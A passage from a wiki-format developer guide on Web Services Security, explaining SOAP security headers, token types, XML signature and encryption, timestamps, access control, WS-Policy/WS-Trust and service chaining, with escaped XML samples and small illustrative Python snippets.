''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
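For comparison, the minimal empty security header shown earlier can be produced with Python's standard-library ElementTree, using the namespace URIs from the examples above (the serializer will generate its own namespace prefixes rather than the hand-written soap/wsse ones, which is equivalent in XML):&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
WSSE = ("http://docs.oasis-open.org/wss/2004/01/"
        "oasis-200401-wss-wssecurity-secext-1.0.xsd")

# Build Envelope/Header/Security plus an empty Body.
envelope = ET.Element(f"{{{SOAP}}}Envelope")
header = ET.SubElement(envelope, f"{{{SOAP}}}Header")
ET.SubElement(header, f"{{{WSSE}}}Security",
              {f"{{{SOAP}}}mustUnderstand": "1"})
ET.SubElement(envelope, f"{{{SOAP}}}Body")

xml_text = ET.tostring(envelope, encoding="unicode")
```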
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
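The formula above translates directly into Python's standard library. The nonce here is the raw bytes before their own Base64 encoding in the token, and the password and timestamp values are placeholders for illustration:&lt;br /&gt;

```python
import base64
import hashlib
import os

def password_digest(password, nonce, created):
    """Password_Digest = Base64( SHA-1( nonce + created + password ) )."""
    raw = nonce + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")

nonce = os.urandom(16)               # fresh random nonce per message
created = "2005-01-27T16:46:10Z"     # placeholder wsu:Created value
digest = password_digest("s3cret", nonce, created)
```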
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure the message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs must be unique within the scope of the XML document where they are defined. Its application has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have a closed schema), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
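&lt;br /&gt;
The schema-independence of wsu:Id can be sketched as follows – an intermediary resolves a local reference such as &amp;quot;#body-1&amp;quot; by scanning the tree for a matching attribute value, with no knowledge of the message schema (the SOAP fragment and the function name below are illustrative):&lt;br /&gt;

```python
# Minimal sketch of wsu:Id dereferencing: find an element by its wsu:Id
# value anywhere in the document, without knowing the message's schema.
import xml.etree.ElementTree as ET

# Standard wsu utility namespace from the WSS 1.0 specification.
WSU_ID = "{http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0}Id"

SOAP = """<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0">
  <soap:Body wsu:Id="body-1"><order>42</order></soap:Body>
</soap:Envelope>"""

def find_by_wsu_id(root, uri):
    """Resolve a local URI reference like '#body-1' to its element, or None."""
    wanted = uri.lstrip("#")
    for element in root.iter():  # schema-agnostic scan of the whole tree
        if element.get(WSU_ID) == wanted:
            return element
    return None

root = ET.fromstring(SOAP)
print(find_by_wsu_id(root, "#body-1").tag)
```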
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to practically any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (a kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Enveloping or Enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
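&lt;br /&gt;
The effect of canonicalization can be demonstrated with a short Python sketch. Note that Python’s standard library implements W3C Canonical XML 2.0 rather than EXC-C14N, so this only illustrates the principle, not the exact WSS-recommended transform:&lt;br /&gt;

```python
# Two semantically equivalent serializations of the same document hash
# differently as raw bytes, but identically after canonicalization
# (which sorts attributes, normalizes quoting, and expands empty tags).
import hashlib
from xml.etree.ElementTree import canonicalize  # Python 3.8+

doc_a = '<doc xmlns:x="urn:example"><x:item b="1" a="2"/></doc>'
doc_b = "<doc xmlns:x='urn:example'><x:item a=\"2\"   b=\"1\"></x:item></doc>"

raw_equal = hashlib.sha1(doc_a.encode()).digest() == hashlib.sha1(doc_b.encode()).digest()
c14n_equal = (
    hashlib.sha1(canonicalize(doc_a).encode()).digest()
    == hashlib.sha1(canonicalize(doc_b).encode()).digest()
)
print(raw_equal, c14n_equal)
```

Without the canonical transform the two byte streams produce different digests, so a signature computed over one serialization would not verify against the other.&lt;br /&gt;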
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may be applied (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message with overlapping signature and encryption blocks, as in that case there is nothing that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. Like XML-dsig, this standard operates on selected elements of the SOAP message, but it replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
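&lt;br /&gt;
Structurally, the substitution can be sketched as below. This is an illustration only – the placeholder bytes stand in for real ciphertext, and a real implementation would also carry algorithm and key information:&lt;br /&gt;

```python
# Sketch of the structural effect of XML Encryption: the plaintext content
# of the selected element is replaced by an <xenc:EncryptedData> child
# whose <xenc:CipherValue> carries the Base64-encoded ciphertext.
import base64
import xml.etree.ElementTree as ET

XENC = "http://www.w3.org/2001/04/xmlenc#"
ET.register_namespace("xenc", XENC)

def replace_with_encrypted_data(element, ciphertext):
    """Swap an element's content for an EncryptedData placeholder."""
    for child in list(element):
        element.remove(child)
    element.text = None
    enc = ET.SubElement(element, f"{{{XENC}}}EncryptedData")
    cipher_data = ET.SubElement(enc, f"{{{XENC}}}CipherData")
    cipher_value = ET.SubElement(cipher_data, f"{{{XENC}}}CipherValue")
    cipher_value.text = base64.b64encode(ciphertext).decode("ascii")

body = ET.fromstring("<Body><CreditCard>4111 0000 0000 0000</CreditCard></Body>")
replace_with_encrypted_data(body, b"opaque-cipher-bytes")  # fake ciphertext
print(ET.tostring(body, encoding="unicode"))
```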
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP message freshness is addressed via the timestamp mechanism – each security header may contain just one such element, which states, in the UTC time format, the creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
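&lt;br /&gt;
A receiver-side freshness check might be sketched as follows (the names and the five-minute skew allowance are illustrative assumptions, not mandated by the specification):&lt;br /&gt;

```python
# Hedged sketch of checking a wsu:Timestamp's Created/Expires window,
# with a configurable allowance for clock skew between the two parties.
from datetime import datetime, timedelta, timezone

UTC_FORMAT = "%Y-%m-%dT%H:%M:%SZ"

def is_fresh(created, expires, now, skew=timedelta(minutes=5)):
    """True if `now` falls inside [Created - skew, Expires + skew]."""
    created_at = datetime.strptime(created, UTC_FORMAT).replace(tzinfo=timezone.utc)
    expires_at = datetime.strptime(expires, UTC_FORMAT).replace(tzinfo=timezone.utc)
    # Reject messages "from the future" beyond the skew, and expired ones.
    return created_at - skew <= now <= expires_at + skew

now = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
print(is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now))
```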
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be are completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks them against the backend user store, or extracts the subject name from the X.509 certificate used to sign the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define the Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Service communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient detail to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms for determining the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate message protection measures when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types; the one for security is WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to a public body, and their development is progressing via private collaboration among several companies, although it has been opened up to other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is the theory. In practice, there are a lot of obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Service interaction: incompatible authentication and authorization models for users, the amount of trust between the services themselves and the ways of establishing such trust, maintaining secure connections, and synchronizing user directories or otherwise exchanging user attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as the user population tends to change frequently across domains. So, how does a service in domain B decide whether to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means) and that authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is communicated – as would be the case with several large corporations that would like to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures, establishing special trust relationships and allowing for the exchange of such opaque tokens – an example of a Federation relationship. The most notable of those efforts is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are POCs or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that will assess conformance of the incoming SOAP messages to the applicable standards, as well as appropriately secure the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to incorporate them immediately, relying on Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once the standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally ships. The next release of WSE, 3.0, is going to coincide with the VS 2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area, and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check against WSE-secured .NET Web Service clients. If you have a Java-based Web Service and interoperability is a requirement (which is usually the case), then, in addition to security testing, one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
